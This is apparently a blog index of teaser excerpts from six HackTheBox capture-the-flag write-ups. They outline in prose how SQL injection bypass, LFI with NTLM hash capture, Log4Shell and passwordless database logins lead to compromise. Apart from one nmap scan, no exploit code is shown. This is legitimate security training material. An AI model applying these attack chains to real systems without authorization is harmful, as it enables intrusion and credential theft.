Very Easy

Appointment A deceptively simple box that proves sometimes the oldest tricks in the book are the most effective. Appointment is a single-page web challenge centered entirely on a PHP login form vulnerable to SQL injection authentication bypass — no rabbit holes, no pivoting, just clean exploitation of a classic vulnerability. Overview Appointment runs a bare-bones Apache web server with a PHP login form as its only attack surface. The goal is straightforward: bypass authentication using SQL injection to retrieve the flag. It’s a great box for internalizing why SQL injection works, not just how to use it. ...

Crocodile — HackTheBox Writeup Crocodile is a very easy Linux box that demonstrates how anonymous FTP access can expose credentials that unlock a web application login. The attack chain is short but teaches a fundamental methodology: always enumerate every open service, because sensitive information on one port can become your key into another. Reconnaissance I started with a service-version scan to understand what was running on the target: nmap -sV -sC <TARGET> ...

Responder — HackTheBox Writeup Responder is a Very Easy Windows box that chains a classic Local File Inclusion vulnerability with NTLM hash capture to gain a foothold via WinRM. It’s an excellent introduction to how Windows authentication can be weaponized against itself when a server blindly follows UNC paths. Overview The attack path here is beautifully simple once you see it: a PHP web application has an LFI vulnerability in its language selector, Windows will attempt NTLM authentication when it tries to access a UNC path, and we’re sitting there with Responder ready to catch the hash. Crack the hash, log in over WinRM, read the flag. Along the way I hit a firewall issue that was a useful reminder about VPN interface trust zones — more on that later. ...

Sequel Sometimes the simplest misconfiguration is the most damaging. Sequel is a very easy Linux box that exposes a MariaDB instance with no root password — no exploits required, just knowing to try the door before assuming it’s locked. Overview This box runs a single service: MySQL/MariaDB on port 3306. The entire challenge is recognizing that the database accepts unauthenticated connections as root, then methodically enumerating databases and tables until you find the flag. It’s a great introduction to database enumeration methodology and a real-world reminder of how often default or missing credentials appear in the wild. ...

Unified — Log4Shell to Root via MongoDB Hash Swap Unified is a Very Easy Linux box that demonstrates one of the most impactful vulnerabilities in recent memory: Log4Shell (CVE-2021-44228). The box runs a vulnerable version of UniFi Network Controller, and exploitation chains together a JNDI injection for initial access with an unauthenticated MongoDB instance to escalate all the way to root. Reconnaissance I started with an automated Nmap scan to get a picture of what was running on the box. ...

Vaccine — HackTheBox Writeup Vaccine is a Very Easy Linux box that chains together several classic web exploitation techniques: anonymous FTP access, zip cracking, hardcoded credentials, SQL injection, and a sudo misconfiguration that hands over root in seconds. Each step feeds directly into the next, making it an excellent box for learning how a real attack chain flows from initial recon to full compromise. Overview Field Value IP OS Linux (Ubuntu 20.04) Difficulty Very Easy Reconnaissance Port Scan I always start with a service/version scan using Nmap’s default scripts (-sC) alongside version detection (-sV). Treating the target as if ICMP is blocked from the start (-Pn) saves frustration on boxes that don’t respond to ping. ...